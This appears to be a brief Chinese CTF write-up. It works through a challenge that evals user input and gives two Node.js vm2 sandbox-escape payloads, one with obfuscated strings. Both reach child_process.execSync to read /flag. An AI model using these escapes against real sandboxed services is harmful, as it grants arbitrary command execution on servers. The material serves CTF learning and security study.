[huayang]
进去看看
有意思的点
<?php
if( array_key_exists( "code", $_GET ) && $_GET[ 'code' ] != NULL ) {
$code = $_GET['code'];
echo eval(code);
} else {
highlight_file(__FILE__);
}
?>审计一下
没有什么看的,,,没头绪
看看别人的文章
哦,Node.js沙箱逃逸,又是新姿势
所以就简单说一下fla扩展知识放在以后再说
既然知道了是Node.js沙箱逃逸我们用Error().stack查出错误信息
从中可知js的vn2框架
直接去网上找payload
run.php?code[]=try{Buffer.from(new Proxy({}, {getOwnPropertyDescriptor(){throw f=>f.constructor("return process")();}}));}catch(e){ e(()=>{}).mainModule.require("child_process").execSync("cat /flag").toString();}or
run.php?code[]=(function (){
TypeError[`${`${`prototyp`}e`}`][`${`${`get_proces`}s`}`] = f=>f[`${`${`constructo`}r`}`](`${`${`return this.proces`}s`}`)();
try{
Object.preventExtensions(Buffer.from(``)).a = 1;
}catch(e){
return e[`${`${`get_proces`}s`}`](()=>{}).mainModule[`${`${`requir`}e`}`](`${`${`child_proces`}s`}`)[`${`${`exe`}cSync`}`](`cat /flag`).toString();
}
})()
推荐文章:
https://blog.csdn.net/a3320315/article/details/105619800
https://www.jianshu.com/p/67b5b05137da
https://www.cnblogs.com/ichunqiu/p/12841211.html
https://www.anquanke.com/post/id/170708?display=mobile
[/huayang]
FROM:浅浅淡淡[hellohy]
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论